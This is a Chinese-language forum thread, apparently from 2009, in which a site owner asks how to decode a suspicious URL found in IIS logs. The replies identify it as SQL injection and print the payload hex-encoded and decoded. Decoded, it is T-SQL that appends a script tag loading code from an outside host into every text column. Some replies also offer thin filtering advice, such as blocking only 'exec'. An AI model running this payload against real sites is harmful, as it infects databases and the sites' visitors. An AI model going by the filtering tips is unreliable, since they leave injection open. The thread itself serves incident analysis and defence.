这个URL是什么编码？又该如何解码？

jodgen 2009-12-22 09:20:54

在IIS的日志里发现的

display.asp id=9953%3BdEc%%LaRe%20@s%20vA%rCh%%Ar(8000)%20s%%Et%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52%20e%%XeC(@s)

...全文

212 10 打赏收藏转发到动态举报

写回复

用AI写文章

10 条回复

切换为时间正序

请发表友善的回复…

发表回复

rainnomore 2010-03-23

打赏
举报

adf

iscandy 2009-12-24

打赏
举报

其实现在 SQL注入都是这样的模式：定义一个s，s的内容是16进制表示的字符串，然后 exec(s) 执行。

所以，你只要过滤 exec这一关就够了，

request取参数是自动转换 %20、%% 等编码的，所以你不用管它传过来的是 exec 还是 e%%xec ，

另外，不是所有的参数都需要过滤，你只需过滤与SQL语句进行连接的参数。

lioncin 2009-12-23

打赏
举报

坐等答案

hitlcyu19 2009-12-23

打赏
举报

[Quote=引用 5 楼 jodgen 的回复:]
引用 1 楼 iscandy 的回复:
这是被SQL注入了

dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+'' </title>"> <script src=http://%61%2E%70%70%6D%6D%6F%6F%2E%63%6E> </script> <!--''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR

非常感谢，您能告诉我如何解码的吗？我需要在程序里加入解码和检测程序
[/Quote]
我也想知道

jodgen 2009-12-23

打赏
举报

[Quote=引用 1 楼 iscandy 的回复:]
这是被SQL注入了

dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+'' </title>"> <script src=http://%61%2E%70%70%6D%6D%6F%6F%2E%63%6E> </script> <!--''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR
[/Quote]

非常感谢，您能告诉我如何解码的吗？我需要在程序里加入解码和检测程序

jodgen 2009-12-23

打赏
举报

感谢楼上的几位，为什么我检查了QUERY_STRING的长度，超过30就卡掉，还是挡不住呢？

gingerkang 2009-12-23

打赏
举报

%3B这样的是url编码,%%这样的不会被识别的会被舍弃
上面的可以用get尝试接收,得到还原的get值, 其中set @s后面是varbinary数据,在查询分析器其中直接print @s会让他转化成他定义的varchar(8000)的数据类型的值,就可以看到了,要弄成他这样的一长串,直接print convert(varbinary(8000),@s)就可以看到了.

hitlcyu19 2009-12-22

打赏
举报

id=9953;declare @s varchar(8000) set @s=后面的值是16进制的数

anbs01 2009-12-22

打赏
举报

escape编码

iscandy 2009-12-22

打赏
举报

这是被SQL注入了

dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title>"><script src=http://%61%2E%70%70%6D%6D%6F%6F%2E%63%6E></script><!--''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR